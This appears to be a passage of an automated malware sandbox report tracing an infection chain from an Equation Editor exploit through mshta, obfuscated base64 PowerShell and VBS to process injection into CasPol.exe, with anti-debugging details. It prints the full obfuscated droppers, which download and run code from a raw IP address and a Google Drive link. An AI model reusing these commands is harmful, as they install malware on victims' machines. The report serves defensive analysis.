                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1288Thread sleep count: 1609 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3692Thread sleep time: -13835058055282155s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3668Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3692Thread sleep time: -3000000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 680Thread sleep time: -30000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2204Thread sleep count: 217 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2204Thread sleep time: -108500s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2064Thread sleep count: 2567 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2064Thread sleep time: -7701000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 3784Thread sleep time: -180000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2064Thread sleep count: 6964 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2064Thread sleep time: -20892000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 3828Thread sleep time: -120000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,20_2_0040928E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,20_2_0041C322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,20_2_0040C388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,20_2_004096A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,20_2_00408847
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_00407877 FindFirstFileW,FindNextFileW,20_2_00407877
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0044E8F9 FindFirstFileExA,20_2_0044E8F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,20_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,20_2_00419B86
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,20_2_0040BD72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,20_2_100010F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_10006580 FindFirstFileExA,20_2_10006580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_0040AE51 FindFirstFileW,FindNextFileW,22_2_0040AE51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 23_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,23_2_00407EF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,24_2_00407898
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,20_2_00407CD2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_00418981 memset,GetSystemInfo,22_2_00418981
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00434A8A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,22_2_0040DD85
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,20_2_0041CBE1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_00443355 mov eax, dword ptr fs:[00000030h]20_2_00443355
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_10004AB4 mov eax, dword ptr fs:[00000030h]20_2_10004AB4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_00411D39 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,20_2_00411D39
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_00434BD8 SetUnhandledExceptionFilter,20_2_00434BD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_0043503C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00434A8A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_0043BB71
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_100060E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_10002639
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_10002B1C

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3180, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2924, type: MEMORYSTR
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdhVUtpbWFnZVVybCA9IHp0c2h0dHBzOi8vZCcrJ3JpdmUuZ29vZ2xlLmNvbS91YycrJz9leHBvJysncnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHp0czsnKydhVUt3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O2FVS2ltYWdlQnl0ZXMgPSBhVUt3JysnZWJDbGllbnQuRG93bmxvYWREYXRhKGFVS2ltYWdlVXJsKTthVUtpbWFnZVRleCcrJ3QgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhhVUtpbWFnZUJ5dGVzKTthVUtzdGFydEZsYWcgPSB6dHM8PEJBU0U2NF9TVEFSVD4+enRzO2FVS2VuZEZsYWcnKycgPSB6dHM8PEJBU0U2NF9FTkQ+Pnp0czthVUtzdGFydEluZGV4ID0gYVVLaW1hZ2VUZXh0LkluZGV4T2YoYVVLc3RhcnRGbGFnKTthVUtlbmRJbmRleCA9IGFVS2ltYWdlVGV4dC5JbmRleE9mKGFVS2VuZEZsYWcpO2FVS3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBhVUtlbmRJbmRleCAtZ3QnKycgJysnYVVLc3RhcnRJbmRleDthVUtzdCcrJ2FydEluZGV4ICs9IGFVS3N0YXJ0RmxhZy5MZW5nJysndGg7YVVLYmFzZTY0TGVuZ3RoID0gYVVLZW5kSW5kZXggLSBhVUtzdGFydEluZGV4O2FVS2JhJysnc2U2NENvbW1hbmQgPSBhVUtpbWFnZVRleHQuU3Vic3RyaW5nKGFVS3N0YXJ0SW5kZXgsIGFVS2Jhc2U2NExlbmd0aCk7YVVLYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoYVVLYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIGRyYiBGb3JFYWNoLU9iamVjdCB7IGFVS18gfSlbLTEuLi0oYVVLYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTthVUtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdJysnOjpGcm9tQmFzJysnZTY0U3RyaW5nKGFVS2Jhc2U2NFJldmVyc2VkKTthVUtsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoYVVLY29tbWFuZEJ5dGVzKTthVUt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0JysnaG9kKHp0c1ZBSXp0cyk7YVVLdmFpTWUnKyd0aG9kLkludm9rZShhVUtudWxsLCBAKHonKyd0c3R4dC5FQ0RGRlJXLzA3Mi8yOC42MDIuNTEyLjU4Ly86cHR0aHp0cywgenRzZGVzYXRpdmFkb3p0JysncywgenRzZGVzJysnYXRpdmEnKydkb3p0cywgenRzZGVzYXRpdmFkb3p0cywgenRzQ2FzUG9senRzLCB6dHNkZXNhdGl2YWRvenRzLCB6dHNkZScrJ3NhdGl2YWRvenRzLHp0c2Rlc2F0aXZhZG96dHMsenRzJysnZGVzYXRpdmFkb3p0cyx6dHNkZXNhdGl2YWRvenQnKydzLHp0c2Rlc2F0aXZhZG96dHMsJysnenRzZGVzYXRpdmFkb3p0cyx6dHMxenRzLHp0c2Rlc2F0aXZhZG96dHMpKTsnKS5yZXBsYWNFKCdhVUsnLCckJykucmVwbGFjRSgnenRzJyxbc1RSaW5HXVtjSEFyXTM5KS5yZXBsYWNFKCdkcmInLCd8Jyl8IC4gKCAkcFNIb01lWzIxXSskUFNob01FWzM0XSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,20_2_0041812A
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and write
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 459000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 471000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 477000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 478000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 479000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 47E000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 7EFDE008
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe20_2_00412132
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_00419662 mouse_event,20_2_00419662
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\wennedgreatthingswithgoodnwesforentrie.hta" Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEm32\WindOwsPoWErSHEll\v1.0\PoweRshELL.exE" "POWERsheLl -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe ; iex($(iEx('[SysTEM.tEXT.ENcODING]'+[Char]58+[chAr]58+'utf8.GeTStriNG([sysTem.CONVerT]'+[cHar]0X3A+[CHAr]0x3a+'FrOMBASE64STrINg('+[ChAR]0x22+'JEZYM0s5RDc1TktmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtdHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFZklOSVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGNrY1BoYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFXSkxTaU8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTUGl1VmssdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTXZ1bmphZ0RWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUt4U2tndUgpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiciIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEd4ZVNNVkJxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkRlgzSzlENzVOS2Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly84NS4yMTUuMjA2LjgyLzI3MC9pZ2V0YmVzdHRoaW5nc3dpdGhiZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc29ubWUudElGIiwiJEVudjpBUFBEQVRBXGdldGJlc3R0aGluZ3N3aXRoYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3Nvbi52YlMiLDAsMCk7U3RBclQtU2xlRVAoMyk7U1RBUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcZ2V0YmVzdHRoaW5nc3dpdGhiZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc29uLnZiUyI='+[cHAR]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXeJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.cmdline"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\getbestthingswithbestpicturewithgreatthingson.vbS" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8872.tmp" "c:\Users\user\AppData\Local\Temp\j0qjax5r\CSC3F30325724544FF3B51B1BF07A1EFBCB.TMP"Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdhVUtpbWFnZVVybCA9IHp0c2h0dHBzOi8vZCcrJ3JpdmUuZ29vZ2xlLmNvbS91YycrJz9leHBvJysncnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHp0czsnKydhVUt3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O2FVS2ltYWdlQnl0ZXMgPSBhVUt3JysnZWJDbGllbnQuRG93bmxvYWREYXRhKGFVS2ltYWdlVXJsKTthVUtpbWFnZVRleCcrJ3QgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhhVUtpbWFnZUJ5dGVzKTthVUtzdGFydEZsYWcgPSB6dHM8PEJBU0U2NF9TVEFSVD4+enRzO2FVS2VuZEZsYWcnKycgPSB6dHM8PEJBU0U2NF9FTkQ+Pnp0czthVUtzdGFydEluZGV4ID0gYVVLaW1hZ2VUZXh0LkluZGV4T2YoYVVLc3RhcnRGbGFnKTthVUtlbmRJbmRleCA9IGFVS2ltYWdlVGV4dC5JbmRleE9mKGFVS2VuZEZsYWcpO2FVS3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBhVUtlbmRJbmRleCAtZ3QnKycgJysnYVVLc3RhcnRJbmRleDthVUtzdCcrJ2FydEluZGV4ICs9IGFVS3N0YXJ0RmxhZy5MZW5nJysndGg7YVVLYmFzZTY0TGVuZ3RoID0gYVVLZW5kSW5kZXggLSBhVUtzdGFydEluZGV4O2FVS2JhJysnc2U2NENvbW1hbmQgPSBhVUtpbWFnZVRleHQuU3Vic3RyaW5nKGFVS3N0YXJ0SW5kZXgsIGFVS2Jhc2U2NExlbmd0aCk7YVVLYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoYVVLYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIGRyYiBGb3JFYWNoLU9iamVjdCB7IGFVS18gfSlbLTEuLi0oYVVLYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTthVUtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdJysnOjpGcm9tQmFzJysnZTY0U3RyaW5nKGFVS2Jhc2U2NFJldmVyc2VkKTthVUtsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoYVVLY29tbWFuZEJ5dGVzKTthVUt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0JysnaG9kKHp0c1ZBSXp0cyk7YVVLdmFpTWUnKyd0aG9kLkludm9rZShhVUtudWxsLCBAKHonKyd0c3R4dC5FQ0RGRlJXLzA3Mi8yOC42MDIuNTEyLjU4Ly86cHR0aHp0cywgenRzZGVzYXRpdmFkb3p0JysncywgenRzZGVzJysnYXRpdmEnKydkb3p0cywgenRzZGVzYXRpdmFkb3p0cywgenRzQ2FzUG9senRzLCB6dHNkZXNhdGl2YWRvenRzLCB6dHNkZScrJ3NhdGl2YWRvenRzLHp0c2Rlc2F0aXZhZG96dHMsenRzJysnZGVzYXRpdmFkb3p0cyx6dHNkZXNhdGl2YWRvenQnKydzLHp0c2Rlc2F0aXZhZG96dHMsJysnenRzZGVzYXRpdmFkb3p0cyx6dHMxenRzLHp0c2Rlc2F0aXZhZG96dHMpKTsnKS5yZXBsYWNFKCdhVUsnLCckJykucmVwbGFjRSgnenRzJyxbc1RSaW5HXVtjSEFyXTM5KS5yZXBsYWNFKCdkcmInLCd8Jyl8IC4gKCAkcFNIb01lWzIxXSskUFNob01FWzM0XSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net.WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object { aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = [System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = [dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,ztsdesativadozts,'+'ztsdesativadozts,zts1zts,ztsdesativadozts));').replacE('aUK','$').replacE('zts',[sTRinG][cHAr]39).replacE('drb','|')| . ( $pSHoMe[21]+$PShoME[34]+'X')"Jump to behavior
